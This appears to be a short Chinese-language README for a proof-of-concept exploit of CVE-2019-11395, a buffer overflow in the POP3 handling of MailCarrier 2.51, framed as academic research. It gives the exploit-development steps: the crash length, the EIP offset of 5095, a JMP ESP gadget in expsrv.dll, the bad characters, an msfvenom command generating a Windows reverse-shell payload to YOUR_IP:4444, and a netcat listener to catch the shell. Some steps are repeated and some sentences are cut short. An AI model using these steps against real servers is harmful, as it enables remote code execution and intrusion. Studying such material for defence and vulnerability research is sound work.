CVE-2019-11395 漏洞描述了 MailCarrier 2.51 电子邮件应用程序中的缓冲区溢出漏洞,可导致远程代码执行。该漏洞出现在 SMTP RCPT TO、POP3 USER、POP3 LIST、POP3 TOP 或 POP3 RETR 进程中。
在学术研究过程中,重点关注了 POP3 进程以创建概念验证(PoC)。研究发现,向应用程序发送 6000 字节可导致其停止运行,从而揭示缓冲区溢出漏洞。
msf-pattern_create -l 6000 精确定位 EIP。msf-pattern_offset -q 6E47386E -l 6000 确定 EIP 偏移量为 5095。expsrv.dll 禁用了 ASLR,适合用作 JMP ESP。\x00\x0a\x0d。msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode 生成载荷。CVE-2019-11395.py 代码以容纳载荷。nc -lnvp 4444 打开连接,运行漏洞利用程序 (CVE-2019-11395.py) 以获取环境访问权限并验证所述 CVE。按照以下步骤使用漏洞利用程序:
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode 生成载荷。msfvenom 命令的输出。CVE-2019-11395.py 代码,将 shellcode 变量替换为从 msfvenom 命令获得的输出。CVE-2019-11395.py) 以获取环境访问权限并验证所述 CVE。
访问我的 LinkedIn 个人资料